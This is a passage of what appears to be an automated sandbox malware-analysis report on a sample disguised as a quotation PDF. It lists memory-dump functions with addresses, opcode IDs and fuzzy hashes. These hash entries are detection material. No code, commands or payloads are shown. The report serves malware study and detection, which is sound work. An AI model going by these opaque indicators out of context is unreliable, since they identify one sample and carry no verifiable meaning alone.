Instruction Fuzzy Hash: D1019B31A8CA164BF7789218B8423BD72E1FF817A0F14173AC49BC25C5DE2978C2C281

Function 00007FF887CD3BE0 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1936174017.00007FF887CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887CD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887cd0000_QUOTATION_OCTQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b6ba9d8128b0cc83e9dc1d7297668b9c21edededc16b78820793e5bb4c8e8791
Instruction ID: aa222c094c7fc3cabffa84e03ea4553040ca403276a8e884f78ecb666a986cd7
Opcode Fuzzy Hash: b6ba9d8128b0cc83e9dc1d7297668b9c21edededc16b78820793e5bb4c8e8791
Instruction Fuzzy Hash: BDF0B47260CA1C5EA768A52DAC0B5F777E9EB96671B00023FE48EC3512ED21BC1386D5

Function 00007FF887CD2E0B Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1936174017.00007FF887CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887CD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887cd0000_QUOTATION_OCTQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 831f33c6341588497e1a745c206d7874c8f5d08449ac92cf65533303bb26163d
Instruction ID: 89b066fecefd969603e824ae9cb918788a6e22867609f5dd356c17d087d1f4fe
Opcode Fuzzy Hash: 831f33c6341588497e1a745c206d7874c8f5d08449ac92cf65533303bb26163d
Instruction Fuzzy Hash: 0901813170CE498F9BA8EA2CC49693973E3FBA82513144579D04EC76A6DE24EC45C740

Function 00007FF887AF1C81 Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1935021594.00007FF887AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887af0000_QUOTATION_OCTQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 334f06ca368a303db082edc13b8ab25807f97c860114316740b7c3c0fda7ac31
Instruction ID: 5f27a2f0ebf137c4acd7aa0efefba0fa9cfcaa9fecf021100fc4ae0b9ef2cce2
Opcode Fuzzy Hash: 334f06ca368a303db082edc13b8ab25807f97c860114316740b7c3c0fda7ac31
Instruction Fuzzy Hash: 0EF027B254D60C2EEB0C9A19EC0B9FB37E8EF87238F00012EE58FC2052E1527923C255

Function 00007FF887CE06E9 Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1936174017.00007FF887CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887CD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887cd0000_QUOTATION_OCTQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5a40da67bec497d0f7af57957bf4ffea84e0aa08f5279298b25caeb7d0b4a09f
Instruction ID: 40774bb2f34e5294270f3b0746ca35c3b01de06f40a1de899e78d8d70081c252
Opcode Fuzzy Hash: 5a40da67bec497d0f7af57957bf4ffea84e0aa08f5279298b25caeb7d0b4a09f
Instruction Fuzzy Hash: B711C3719496198FEB68DB14C894BEDB7B1FB18340F2001BEC00AE7291DB395A80CF41

Function 00007FF887CD9D80 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1936174017.00007FF887CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887CD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887cd0000_QUOTATION_OCTQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b3070b85b65131969cb15b9241e4b254c195577cf8bd4b9c1f78b1302ac94367
Instruction ID: 02ea79aa391ea372ccae1a62ab4bb8ca1bcf15a954ef09e0d0a3152900ef7067
Opcode Fuzzy Hash: b3070b85b65131969cb15b9241e4b254c195577cf8bd4b9c1f78b1302ac94367
Instruction Fuzzy Hash: 67012630618A064FE7789A6DD4986BAF7E1FF68364F10063AD05AC32C5DB78A8C1CB44

Function 00007FF887CDEF99 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1936174017.00007FF887CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887CD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887cd0000_QUOTATION_OCTQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fb3aeb5cc01d3a719857a47abdde03e4d984352854dd0fae446af419c60261cc
Instruction ID: 0ce92fc3d41bc34429699cbee2c1cfc1f1e7be39f4fa1c9d54e7e8156c4e3f05
Opcode Fuzzy Hash: fb3aeb5cc01d3a719857a47abdde03e4d984352854dd0fae446af419c60261cc
Instruction Fuzzy Hash: 2101573084968D8FDB95DF58C858AEE7FF0FF25300F4401AAD408D72A2DA39D954CB81

Function 00007FF887AF17AF Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1935021594.00007FF887AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887af0000_QUOTATION_OCTQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fea5220de873e5627340b642a9a9b7cdcdbe87542c2300f07a7f6ec7cbaf7034
Instruction ID: 4d5412c6cccc76333894f88a149c7c580ffd2de39e10dbd8cde1e8f9f68abcb7
Opcode Fuzzy Hash: fea5220de873e5627340b642a9a9b7cdcdbe87542c2300f07a7f6ec7cbaf7034
Instruction Fuzzy Hash: 8F011A21A1C5598AEB64EBB8C4657AD76E0AF58341F20057ED40AD7292DE28A841CB82

Function 00007FF887AF22AD Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1935021594.00007FF887AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887af0000_QUOTATION_OCTQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: baf9b34eceb3115a80c2bfecee468d6014c8a0fc651ed7e6eef131986a95e947
Instruction ID: 42bc18b85ef7664fb65762d9c9fd48e36f040d0d0bdba97ce03145b9a372172d
Opcode Fuzzy Hash: baf9b34eceb3115a80c2bfecee468d6014c8a0fc651ed7e6eef131986a95e947
Instruction Fuzzy Hash: 36018120A8CB564BFB79D61894423BD76E2FF95790F14063EC48BC25C6DE6CB886C291

Function 00007FF887AFA211 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1935021594.00007FF887AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887af0000_QUOTATION_OCTQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cb5c925270321db4d6691d6ae331296af05d5fcff6a87f79fdccd37497e6c3a6
Instruction ID: 1f1666980fbe650d31d6e080df1461a6dcc24c5743f67d2203fc5e715d26790a
Opcode Fuzzy Hash: cb5c925270321db4d6691d6ae331296af05d5fcff6a87f79fdccd37497e6c3a6
Instruction Fuzzy Hash: 4CF0AF3095864D8FDB48EF64C8452EC7BF0FF5A340F5501AAD419D71A2EB38A554CB41

Function 00007FF887AFA230 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1935021594.00007FF887AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887af0000_QUOTATION_OCTQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 53e677b65e3ea6089e61c57797487394c31ed0405b32774c7bad462ca46eb193
Instruction ID: 560b055bfcfe17892e1c8e29ae4883bae305faa6e62d5ff75e85628ec73a8a10
Opcode Fuzzy Hash: 53e677b65e3ea6089e61c57797487394c31ed0405b32774c7bad462ca46eb193
Instruction Fuzzy Hash: 1A01FF30818A4D9FEB48EFA488096ED7BF4FF0A300F4000AEE019D31B1DA386244CB52

Function 00007FF887AF3BF3 Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1935021594.00007FF887AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887af0000_QUOTATION_OCTQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9e9e9251bb26f36a8887cd16277ae3043fa8c76cb0e77601a2e8e157e3a5d912
Instruction ID: 4dedba6780c62c58eacb49668fc11a9b3aeb3a26659936f83878ebed7f19e13b
Opcode Fuzzy Hash: 9e9e9251bb26f36a8887cd16277ae3043fa8c76cb0e77601a2e8e157e3a5d912
Instruction Fuzzy Hash: 83F065367CC90A07E72C6A58B8521FDB3A1EF82371BA1063AC51BC56D5ED5BA4828144

Function 00007FF887AF8DF5 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1935021594.00007FF887AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887af0000_QUOTATION_OCTQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cbe70c478c637f25e0fb3101fe3d03a3d362f3748d073ce24dea1a1886a2804b
Instruction ID: de138e80b897a3db7800f3e5c249c7d78aea36f0973796a63473ff54b2278044
Opcode Fuzzy Hash: cbe70c478c637f25e0fb3101fe3d03a3d362f3748d073ce24dea1a1886a2804b
Instruction Fuzzy Hash: A3F0303095490D9FEB40EF58D4896ED77F1FF58345F104436E41CD2190DE39A594C781

Function 00007FF887AF0A5D Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1935021594.00007FF887AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887af0000_QUOTATION_OCTQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a546e0c313f253df711d2b3d6d88ba1500de70b8c88a3f46385ffa5ce69fc1a9
Instruction ID: e2851a7bf0901cb405c651b096a92a39aaa5d6cce6a0e0154d10980ef540d280
Opcode Fuzzy Hash: a546e0c313f253df711d2b3d6d88ba1500de70b8c88a3f46385ffa5ce69fc1a9
Instruction Fuzzy Hash: 85E04861CCF1811FD61622301C934E73F789F03251B4A42D3E454CB493D44D1697C372

Function 00007FF887CDD069 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1936174017.00007FF887CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887CD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887cd0000_QUOTATION_OCTQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 07258418bf0b8107ad232861d83668ca81a7332d3f8c8a68c247aa3d7d0fb80e
Instruction ID: 00f21a01a787e7ff5c3461bb83bda2a61b2fa7291bbe5f6d00b37d4d4b49ab19
Opcode Fuzzy Hash: 07258418bf0b8107ad232861d83668ca81a7332d3f8c8a68c247aa3d7d0fb80e
Instruction Fuzzy Hash: 7CF03C3085D7898FD756AF6488556AC3FB0FF55200F4504FBD408CB1D3EA38A598CB41

Function 00007FF887CE49A9 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1936174017.00007FF887CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887CD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887cd0000_QUOTATION_OCTQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a09ab2964b8872bd774fcb517f49445b1dc0f424c202980e3126109ab0541361
Instruction ID: 9d2048b46f88a580729ce1c6d0dfc3d6f77a25ec10686712cfdcbedbbe814575
Opcode Fuzzy Hash: a09ab2964b8872bd774fcb517f49445b1dc0f424c202980e3126109ab0541361
Instruction Fuzzy Hash: 5AF0873184D7888FDB46AF24C8556AC3FB0FF16200F4501EAE408D6192EA389644CB01

Function 00007FF887AF2887 Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1935021594.00007FF887AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887af0000_QUOTATION_OCTQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3dbf60934b8db1696a37bb46daf6cdea6f18a2073293eb98bb96b5d0b586b1dc
Instruction ID: d0363a08827b3aa42135849b504b87ed1819a95c06042d4414531ed8746f7f75
Opcode Fuzzy Hash: 3dbf60934b8db1696a37bb46daf6cdea6f18a2073293eb98bb96b5d0b586b1dc
Instruction Fuzzy Hash: 48F0CD7194C6498FF31DAA2494666BD77E0FF91381F1001BED04ACB1E2EE2D2881CB82

Function 00007FF887AF45C0 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1935021594.00007FF887AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887af0000_QUOTATION_OCTQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 534bd01d9cd2981cd19653f7846cc7a8a1a50ee5b4a0cd3256468ab5acfe197d
Instruction ID: 541af66197e94dab893d987c168f2a4237f407fd69538129aaf59d374efb36a6
Opcode Fuzzy Hash: 534bd01d9cd2981cd19653f7846cc7a8a1a50ee5b4a0cd3256468ab5acfe197d
Instruction Fuzzy Hash: 72F0E230A5DA068BD308EF18C98247E73F2FF94B50B609538E846C3680DE34FC12CA81

Function 00007FF887AF8E18 Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1935021594.00007FF887AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887af0000_QUOTATION_OCTQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e62b143a93b62918d8c02f474f19fa6955d8c6afb1c8920359ec16db6c019593
Instruction ID: ddbbf939ccf0eb4fc9302d5cc1dbb1d77c09ada93795807c841328e341afcf6b
Opcode Fuzzy Hash: e62b143a93b62918d8c02f474f19fa6955d8c6afb1c8920359ec16db6c019593
Instruction Fuzzy Hash: 87F01C3095490D9FEB84EF68C4896EE7BF1FF68345F004566E81CD2194DA35A6A4CB81

Function 00007FF887AF42DB Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1935021594.00007FF887AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887af0000_QUOTATION_OCTQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 54e6f012172a8ec132d6463a41db10e1029913af4f09ae379f516c3eebba44e3
Instruction ID: 8d5a2a77cdf4f4c0707ca85f2c32eb356f0a50acffc792046d80b2f47c802080
Opcode Fuzzy Hash: 54e6f012172a8ec132d6463a41db10e1029913af4f09ae379f516c3eebba44e3
Instruction Fuzzy Hash: 1DE0E53164CE084FE694EA2CE88266AB7E4FB94360F10056ED159C3155D625E5858B42

Function 00007FF887CE1EF0 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1936174017.00007FF887CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887CD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887cd0000_QUOTATION_OCTQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 169e6fda25f000c6631e19c8862e965914f4ddd0db829db9b7833212a0b0f171
Instruction ID: 824e76d09176da843f279b88fde83efc894318f1c2df47b0b5e39cd5f03d385a
Opcode Fuzzy Hash: 169e6fda25f000c6631e19c8862e965914f4ddd0db829db9b7833212a0b0f171
Instruction Fuzzy Hash: B4F0153185860D9FEB54EFA4C449AED77F9FF08305F5005BAF81DE2190DA34A294CB01

Function 00007FF887AF9EC7 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1935021594.00007FF887AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887af0000_QUOTATION_OCTQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4766e7463382e3a247e2b55572279c2db66535b9fb4087414ef2c2f85da8c7a7
Instruction ID: 5cfcfcea7356e2d949bcc8a0ea3ae8fbea09d3ea5be19acf021c63c60492fb12
Opcode Fuzzy Hash: 4766e7463382e3a247e2b55572279c2db66535b9fb4087414ef2c2f85da8c7a7
Instruction Fuzzy Hash: 86F030218CE7CA8FE717662488A62EC7F70BF22244F0805B7D489DA0D3D95D1819C342

Function 00007FF887AF3E5C Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1935021594.00007FF887AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887af0000_QUOTATION_OCTQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cf94567dddb19129867d15275898d6580dff34d2dbcd586733a9e574dd8e793f
Instruction ID: b1362f4aa23f50bf2dbf3484f73f482fca6f5771038e257efe4552318745b462
Opcode Fuzzy Hash: cf94567dddb19129867d15275898d6580dff34d2dbcd586733a9e574dd8e793f
Instruction Fuzzy Hash: 7BE01221F4D5069FE3589A1C9851669B3D7EFA9360F68467AD00DC3294DD2499028644

Function 00007FF887AF8C90 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1935021594.00007FF887AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887af0000_QUOTATION_OCTQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e60e664e001406841d33a5b191534fac2de056e4398097921edeb063ab80bec0
Instruction ID: ffd5b6c88130e3930f17928ebf01dbdf107446c00c45435b10b4e6fb8054c2fe
Opcode Fuzzy Hash: e60e664e001406841d33a5b191534fac2de056e4398097921edeb063ab80bec0
Instruction Fuzzy Hash: 06F0ED30854A4D9FEB54EF6484496EE77F5FF14345F4005BAE81DE2190DB34A694CB41

Function 00007FF887CD7CBE Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1936174017.00007FF887CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887CD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887cd0000_QUOTATION_OCTQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e539dfd7f3f94fa0de9fb29c50f3149a41cd1579967627a0deb0712f7fe85a8a
Instruction ID: 6aa953f6e224bdcd7df6a27c1d40793ea7eb472a5c10a3cabce1e825ffd9a657
Opcode Fuzzy Hash: e539dfd7f3f94fa0de9fb29c50f3149a41cd1579967627a0deb0712f7fe85a8a
Instruction Fuzzy Hash: 8FD05E01F9C89A0AAFA9767C78552BD51D3EBC9690B805476E00DC33CBDD6C9C835381

Function 00007FF887AF1A97 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1935021594.00007FF887AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887af0000_QUOTATION_OCTQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7daf927f9bcbaf4f144582ae81fd01fe81b2d853714e202eeadc26e498caafc0
Instruction ID: 627f2c9168eb42e63a4abee96240118a5a79ae2792e6ae7f01deba1957fd8ddd
Opcode Fuzzy Hash: 7daf927f9bcbaf4f144582ae81fd01fe81b2d853714e202eeadc26e498caafc0
Instruction Fuzzy Hash: 3DE01A346488098FDB50EB4CC494A9D73F2FB983A1B154261D40ACB2A9DA64ED41CB80

Function 00007FF887CD416B Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1936174017.00007FF887CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887CD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887cd0000_QUOTATION_OCTQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 086122000c7e6232eb21b693b219db2b5a7706a468bcc97bde214bdb16a73175
Instruction ID: 307a94c29ae6e1cca057026d83057b1065a9198acf695755f785bdc4ced3a58e
Opcode Fuzzy Hash: 086122000c7e6232eb21b693b219db2b5a7706a468bcc97bde214bdb16a73175
Instruction Fuzzy Hash: C3E0D830844E064EE7F4EB2E84841367AF2EF64201724047EC849C3562DA24E8C0C340

Function 00007FF887AF46AF Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1935021594.00007FF887AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887af0000_QUOTATION_OCTQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: af4fe846b28035c7924efd155a9d257e000e92eff537464019b8eda66eed19ea
Instruction ID: 319e3b424f5b7098b2a65f3eb545ccc8e35a9d151d660d198ef7e504bbb4debf
Opcode Fuzzy Hash: af4fe846b28035c7924efd155a9d257e000e92eff537464019b8eda66eed19ea
Instruction Fuzzy Hash: B3E04F3074CA018BE758A614C456679B362EBD1761B108639C01AC72D9DE38A452CB80

Function 00007FF887AF99E0 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1935021594.00007FF887AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887af0000_QUOTATION_OCTQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5d5dfd8f64b44bace1858d2ab4cedfd9642e33521fef2899513e78b76c4e9974
Instruction ID: 756e5a888e9607e41d0448412e06ae6a009ff12e85e4a6daa8492c34a6b82c7e
Opcode Fuzzy Hash: 5d5dfd8f64b44bace1858d2ab4cedfd9642e33521fef2899513e78b76c4e9974
Instruction Fuzzy Hash: CDE06D70A4811B8BDB18DF94C4915BE73B1FF10350F10463FD016E2390CB78A650CA80

Function 00007FF887AF2833 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1935021594.00007FF887AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887af0000_QUOTATION_OCTQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4fcf96ad00d9112304e685d219c242b2b96eea790eb5a20d2813aeb971ee6869
Instruction ID: 1dc1c3a69b967295e2ddfe735bf86fce776933dd9fffb14cd6f503476ae84e11
Opcode Fuzzy Hash: 4fcf96ad00d9112304e685d219c242b2b96eea790eb5a20d2813aeb971ee6869
Instruction Fuzzy Hash: 8AE08C35249A068BE325AA20E8956AE33F5FF61351F240A7AC816C77E0DE28E580CF00

Function 00007FF887AF474F Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1935021594.00007FF887AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887af0000_QUOTATION_OCTQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d5eacc10036ad8e6977f83a921e6c2d98dc75b3facb7b325f9410916df93aab
Instruction ID: a4e20e2f708eac686e6065c194bd7da4ef8ce6a30be43cda75563df03bfe269b
Opcode Fuzzy Hash: 8d5eacc10036ad8e6977f83a921e6c2d98dc75b3facb7b325f9410916df93aab
Instruction Fuzzy Hash: 29D05B3064C40A4BF728A504D4526BD33A1FF567E0F240776C10BC62D5ED996402C9D5

Function 00007FF887AF169D Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1935021594.00007FF887AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887af0000_QUOTATION_OCTQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eda0c537a32060163a746dad02787176c75152b2dbd9437c1662d5ea88a62be3
Instruction ID: 27020ceef7ec0cef366c533caa746411320cbe2cc398db7e642e8349b4808f6d
Opcode Fuzzy Hash: eda0c537a32060163a746dad02787176c75152b2dbd9437c1662d5ea88a62be3
Instruction Fuzzy Hash: 45C04C7378D6190D754C244C7C031F8B3C0C683171540257FD98B41957684B34570089

Function 00007FF887AF1C0F Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1935021594.00007FF887AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887af0000_QUOTATION_OCTQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a5bd2fd09b0be66af11748d20a514e64bae18f9002015567d18331663fb16870
Instruction ID: e91ed97182be1831130f3c106638bbca81769566d3f1ba0b0ebd20c415ca7100
Opcode Fuzzy Hash: a5bd2fd09b0be66af11748d20a514e64bae18f9002015567d18331663fb16870
Instruction Fuzzy Hash: AEE0EC31A4840A8FFB54FA50C8A6DED73B2FFA0351F20067AC509C72A6DD68A942C741

Non-executed Functions

Function 00007FF887CD11D1 Relevance: .5, Instructions: 479COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1936174017.00007FF887CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887CD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887cd0000_QUOTATION_OCTQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: da4d31e8bcdf5a79c9ee5aef54e7c29636080fd39a8adce4aee648c38c6e1f24
Instruction ID: a930c37156de6ddb304d53842f4e30abcaf26d7c4ce8bcc1222777199abe34eb
Opcode Fuzzy Hash: da4d31e8bcdf5a79c9ee5aef54e7c29636080fd39a8adce4aee648c38c6e1f24
Instruction Fuzzy Hash: 42F1C12684D2D65BD712FBB8E8512E97FB0BF0326871D41B7D48C8B0A3DE1C7489C696

Function 00007FF887CD12F4 Relevance: .4, Instructions: 376COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1936174017.00007FF887CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887CD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887cd0000_QUOTATION_OCTQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ffa98c9665e52e9b4c7d05c800a2b94cfc271c7e2439270ec4afd68635dc3407
Instruction ID: 4cae6d424d6c242ac775113f515b6d4b7173aa9808b4f52270238d35a3505d7f
Opcode Fuzzy Hash: ffa98c9665e52e9b4c7d05c800a2b94cfc271c7e2439270ec4afd68635dc3407
Instruction Fuzzy Hash: 86C1C32685D29A5AD712FBBCE4523ED7FB0AF03268B1C41B7D48C8A093DD1C7489C697

Function 00007FF887CD13E0 Relevance: .3, Instructions: 299COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1936174017.00007FF887CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887CD0000, based on PE: false

Joe Sandbox IDA Plugin

